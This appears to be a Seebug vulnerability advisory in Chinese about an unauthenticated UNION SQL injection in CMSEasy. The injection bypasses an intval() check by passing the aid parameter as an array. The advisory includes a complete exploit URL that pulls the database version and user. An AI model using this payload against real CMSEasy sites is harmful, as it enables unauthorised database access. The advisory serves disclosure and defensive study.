cmseasy 修复不当前台无需登录union注射(php缺陷绕过)

2015-01-27T00:00:00
ID SSV:94050
Type seebug
Reporter Root
Modified 2015-01-27T00:00:00

Description

简要描述:

cmseasy 修复不当前台无需登录union注射

详细说明:

下载最新版本的cmseasy, 文件大小:9.83 MB 更新日期:2015-01-21 推荐配置:Mysql5.0 + PHP 5.0 看看这里的修复方案: archive.php:

} elseif (intval(front::get('aid'))) { $this->view->archive = archive::getInstance()->getrow(front::get('aid')); $this->view->categorys = category::getpositionlink2($this->view->archive['catid']); $this->view->paylist = pay::getInstance()->getrows('', 50); $this->view->logisticslist = logistics::getInstance()->getrows('', 50);

这里居然搞成intval(front::get('aid')) 这不是自欺欺人呢么 大家都知道intval("1 sdasda") == 1 成立的 还有一个特性,就是如果传递的是数组 <?php $a = array(1234); echo intval($a); ?> 这个的输出结果是1 正好绕过 ok 访问url: http://localhost/cmseasynew/uploads/index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECT/**/1,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=1

<img src="https://images.seebug.org/upload/201501/271218596204fbf864fa92eb3c386234945ecdd2.png" alt="56.png" width="600" onerror="javascript:errimg(this);">

漏洞证明: